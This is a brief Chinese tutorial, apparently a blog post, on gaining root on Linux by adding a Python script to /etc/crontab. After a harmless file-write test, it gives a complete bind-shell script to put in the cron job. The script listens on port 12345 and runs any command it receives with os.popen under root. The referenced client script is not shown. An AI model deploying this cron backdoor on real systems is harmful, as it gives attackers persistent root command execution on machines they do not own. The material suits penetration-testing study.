计划任务提权crontab提权

利用系统 会周期性的去执行特定的指令来提权 在kali下面输入命令： cat /etc/crontab 复制代码 我们修改/etc/crontab 添加一行内容 nanhack.py 代码如下 f_write = open('./nanhack.txt','w+') f_write.write('www.bihuo.cn') f_write.close() 复制代码 创建文件nanhack.txt,内容为www.bihuo.cn 等待一分钟，执行命令 sudo find / -name "nanhack.txt" 复制代码

文件已经创建成功，因为是root权限执行，当前目录直接在root目录

提权方法：

我们替换nanhack.py 为其他内容

1. import socket
   
2. import os
   
3. #AF_INET 代表ipv4 SOCK_STREAM==>tcp
   
4. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   
5. s.bind(('0.0.0.0', 12345))
   
6. s.listen(5)
   
7. 
   
8. while True:
   
9.         conn, addr = s.accept()
   
10.         for i in range(10):
    
11.                 cmd = conn.recv(1024)
    
12.                 print(cmd)
    
13.                 command = cmd.decode(encoding='utf-8')
    
14.                 if command.startswith("cd"):
    
15.                         os.chdir(command[2:].strip())
    
16.                         result = os.getcwd()
    
17.                 else:
    
18.                         result = os.popen(command).read()
    
19.                 if result:
    
20.                         conn.send(result.encode('utf-8'))
    
21.                 else:
    
22.                         conn.send(b'ok')
    

复制代码

这段代码的内容为：监听12345端口，并等待其他机器链接，并执行传递的命令。



等待目标执行后，我们启动客户端 client.py


执行后

提权成功